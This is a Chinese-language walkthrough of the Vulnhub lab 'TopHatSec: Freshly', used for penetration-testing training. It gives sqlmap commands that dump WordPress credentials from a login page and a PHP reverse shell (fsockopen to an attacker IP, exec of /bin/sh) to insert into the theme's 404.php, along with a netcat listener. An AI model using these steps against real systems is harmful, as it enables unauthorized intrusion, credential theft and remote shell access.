Vulnhub靶机渗透测试：TopHatSec: Freshly 详细教学文档<\/h1>

1. 靶机概述<\/h2>

名称<\/strong>: TopHatSec: Freshly<\/li>
来源<\/strong>: Vulnhub<\/li>
发布日期<\/strong>: 2018年2月<\/li>
难度<\/strong>: 中等<\/li>
目标<\/strong>: 通过网络渗透进入系统，找到隐藏的敏感文件中的秘密<\/li>

运行环境<\/strong>: VirtualBox (注意：运行可能会提示错误，原解决链接已失效)<\/li> <\/ul>
2. 环境准备<\/h2>

下载OVA文件并导入VirtualBox<\/li>
配置网络模式为桥接或NAT（根据实际环境选择）<\/li>
启动靶机虚拟机<\/li> <\/ol>
3. 渗透测试流程<\/h2>
3.1 服务发现<\/h3>
端口扫描<\/h4>
使用nmap进行初始扫描：<\/p>
nmap -sS -A -T4 <靶机IP> <\/span><\/span><\/code><\/pre>预期发现开放端口：<\/p> 80\/tcp (HTTP)<\/li> 443\/tcp (HTTPS)<\/li> 8080\/tcp (HTTP - WordPress)<\/li> 可能还有其他服务端口<\/li> <\/ul> 操作系统识别<\/h4> 通过nmap的OS检测功能：<\/p> nmap -O <靶机IP> <\/span><\/span><\/code><\/pre>3.2 Web服务枚举<\/h3> 80端口分析<\/h4> 访问http:\/\/<靶机IP><\/p> <\/li> 使用dirb或gobuster进行目录扫描：<\/p> dirb http:\/\/<靶机IP> <\/span><\/span><\/code><\/pre>或<\/p> gobuster dir -u http:\/\/<靶机IP> -w \/path\/to\/wordlist.txt <\/span><\/span><\/code><\/pre><\/li> 关键发现：<\/p> phpMyAdmin (\/phpmyadmin)<\/li> 登录页面 (\/login.php)<\/li> <\/ul> <\/li> <\/ol> 8080端口分析<\/h4> 访问http:\/\/<靶机IP>:8080<\/li> 确认是WordPress站点<\/li> 使用wpscan进行扫描： wpscan --url http:\/\/<靶机IP>:8080 --enumerate p,u,ap <\/span><\/span><\/code><\/pre><\/li> 发现三个有安全问题的插件（但可能帮助不大）<\/li> <\/ol> 3.3 SQL注入利用<\/h3> 对\/login.php进行SQL注入测试： sqlmap -u "http:\/\/<靶机IP>\/login.php"<\/span> --data=<\/span>"username=test&password=test"<\/span> --level=<\/span>5<\/span> --risk=<\/span>3<\/span> <\/span><\/span><\/code><\/pre><\/li> 确认存在SQL注入漏洞后，获取数据库信息： sqlmap -u "http:\/\/<靶机IP>\/login.php"<\/span> --data=<\/span>"username=test&password=test"<\/span> --dbs <\/span><\/span><\/code><\/pre><\/li> 查看WordPress8080数据库： sqlmap -u "http:\/\/<靶机IP>\/login.php"<\/span> --data=<\/span>"username=test&password=test"<\/span> -D wordpress8080 --tables <\/span><\/span><\/code><\/pre><\/li> 获取WordPress用户凭据： sqlmap -u "http:\/\/<靶机IP>\/login.php"<\/span> --data=<\/span>"username=test&password=test"<\/span> -D wordpress8080 -T wp_users --dump <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3.4 WordPress后台利用<\/h3> 使用获取的凭据登录WordPress后台(http:\/\/<靶机IP>:8080\/wp-admin)<\/li> 修改语言为中文（可选）<\/li> 获取shell的两种方法：<\/li> <\/ol> 方法一：通过插件上传<\/h4> 准备一个包含webshell的zip文件（格式必须正确）<\/li> 在WordPress后台添加新插件并上传<\/li> 激活插件后访问webshell<\/li> <\/ol> 方法二：直接编辑主题文件<\/h4> 进入"外观"->"编辑"<\/li> 选择404.php模板<\/li> 插入以下PHP反向shell代码： <?<\/span>php<\/span> <\/span><\/span>$sock=<\/span>fsockopen<\/span>("<攻击者IP>"<\/span>,<<\/span>监听端口<\/span>><\/span>); <\/span><\/span>exec<\/span>("\/bin\/sh -i <&3 >&3 2>&3"<\/span>); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 保存更改<\/li> <\/ol> 3.5 获取反向shell<\/h3> 在攻击机上设置netcat监听： nc -lvnp <监听端口> <\/span><\/span><\/code><\/pre><\/li> 访问触发404页面的URL（如http:\/\/<靶机IP>:8080\/?p=non-existent-page）<\/li> 检查netcat会话，确认获得shell<\/li> <\/ol> 3.6 权限提升<\/h3> 查看\/etc\/passwd文件： cat \/etc\/passwd <\/span><\/span><\/code><\/pre><\/li> 检查当前用户权限： id <\/span><\/span>whoami <\/span><\/span>sudo -l <\/span><\/span><\/code><\/pre><\/li> 根据发现的信息进行权限提升（具体方法取决于系统配置）<\/li> <\/ol> 3.7 寻找flag<\/h3> 搜索敏感文件： find \/ -name "*secret*"<\/span> -type f 2>\/dev\/null <\/span><\/span>find \/ -name "*flag*"<\/span> -type f 2>\/dev\/null <\/span><\/span><\/code><\/pre><\/li> 检查隐藏目录和文件<\/li> 检查数据库中的敏感表<\/li> 检查用户主目录<\/li> <\/ol> 4. 关键点总结<\/h2> 信息收集<\/strong>：全面的端口扫描和Web目录枚举是成功的关键<\/li> SQL注入<\/strong>：通过sqlmap有效利用SQL注入漏洞获取数据库信息<\/li> WordPress利用<\/strong>：熟悉WordPress的两种getshell方法（插件上传和主题编辑）<\/li> 反向shell<\/strong>：正确设置和触发反向shell连接<\/li> 权限提升<\/strong>：根据系统配置选择合适的提权方法<\/li> flag查找<\/strong>：系统性地搜索所有可能的敏感文件位置<\/li> <\/ol> 5. 注意事项<\/h2> VirtualBox运行此靶机可能会报错，需要根据实际情况解决<\/li> 渗透测试应在授权环境下进行<\/li> 实际环境中路径和文件名可能有所不同，需要灵活调整<\/li> 某些步骤可能需要多次尝试才能成功<\/li> <\/ol> 6. 验证与提交<\/h2> 找到秘密后，按照说明通过电子邮件进行验证（虽然原链接可能已失效，但这是CTF的标准流程）。<\/p>